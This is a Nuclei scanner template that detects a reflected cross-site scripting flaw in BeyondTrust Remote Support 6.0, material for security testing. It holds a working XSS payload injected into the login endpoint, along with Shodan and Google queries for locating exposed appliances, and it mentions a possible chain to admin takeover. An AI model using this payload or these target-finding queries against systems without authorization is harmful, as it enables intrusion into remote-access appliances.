nuclei-templates/http/vulnerabilities/other/beyond-trust-xss.yaml

30 lines
1.2 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: beyond-trust-xss
info:
name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
reference:
- https://www.exploit-db.com/exploits/50632
metadata:
verified: true
max-request: 1
2023-10-17 07:20:28 +00:00
shodan-query: html:"BeyondTrust"
google-query: intext:"BeyondTrust" "Redistribution Prohibited"
tags: beyondtrust,xss,intrusive
2023-10-17 07:20:28 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>") && contains(body, "beyondtrust")'
condition: and